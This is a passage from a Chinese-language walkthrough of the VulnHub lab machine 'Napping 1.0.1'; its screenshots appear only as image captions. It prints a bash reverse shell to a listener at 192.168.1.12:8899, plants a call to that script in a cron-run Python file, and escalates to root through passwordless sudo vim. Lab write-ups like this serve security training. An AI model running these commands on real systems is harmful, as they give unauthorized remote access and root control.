vulnhub靶場|NAPPING: 1.0.1( 二 )


vulnhub靶場|NAPPING: 1.0.1

文章插圖

vulnhub靶場|NAPPING: 1.0.1

文章插圖
發現site_status.txt文件每兩分鐘寫入一次,就表明query.py每兩分鐘執行一次,因此我們就可以寫入反彈shell的腳本來讓query.py腳本進行執行,獲取更高的權限的shell 。
vulnhub靶場|NAPPING: 1.0.1

文章插圖
在/home/daniel下寫入shell.sh文件,文件內容如下:
#!/bin/bashbash -c 'bash -i >& /dev/tcp/192.168.1.12/8899 0>&1'然后在query.py文件中添加對shell.sh腳本的執行,內容如下:
import osos.system('/usr/bin/bash /home/daniel/shell.sh')
vulnhub靶場|NAPPING: 1.0.1

文章插圖
在kali端開啟對8899端口的監聽,成功獲取到adrina用戶的shell權限 。
vulnhub靶場|NAPPING: 1.0.1

文章插圖
 VIM提權:
在adrian用戶的shell里執行sudo -l發現vim權限可以不需要root密碼即可執行,那就使用vim直接寫入shell,命令:sudo vim -c ':!/bin/bash',成功獲取root權限shell 。
vulnhub靶場|NAPPING: 1.0.1

文章插圖

vulnhub靶場|NAPPING: 1.0.1

文章插圖
通過:python3 -c 'import pty;pty.spawn("/bin/bash")'升級下shell 。
vulnhub靶場|NAPPING: 1.0.1

文章插圖
【vulnhub靶場|NAPPING: 1.0.1】

推薦閱讀